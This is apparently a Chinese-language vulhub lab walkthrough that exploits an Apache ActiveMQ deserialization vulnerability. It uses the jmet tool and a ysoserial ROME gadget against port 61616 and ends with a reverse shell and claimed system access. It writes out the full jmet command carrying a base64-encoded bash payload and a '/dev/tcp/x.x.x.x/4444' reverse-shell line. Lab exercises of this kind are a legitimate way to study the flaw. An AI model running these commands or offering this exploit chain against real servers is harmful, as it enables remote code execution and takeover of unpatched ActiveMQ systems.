一、开启vulhub环境

docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本：Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0 

二、访问靶机IP 8161端口 

 默认账户密码 admin/admin，登录

此时qucues事件为空

1、使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,反弹shell
命令（base64加密）}|{base64,-d}|{bash,-i}" -Yp ROME 目标IP 61616

反弹shell命令：echo "bash -i>& /dev/tcp/x.x.x.x/4444 0>&1"> /tmp/shell.sh && bash /tmp/shell.sh

出现此情况，是Java版本过高，根据以下链接更换Java版本

https://blog.csdn.net/weixin_46686336/article/details/140635571

切换完成后重新执行命令

出现以上情况就是执行成功

2、返回web页面，刷新

此时就多了一个事件，证明shell已经成功写入

3、攻击机开启nc监听

三、点击事件，成功反弹

至此，成功拿下系统权限。

下期再见，家人们！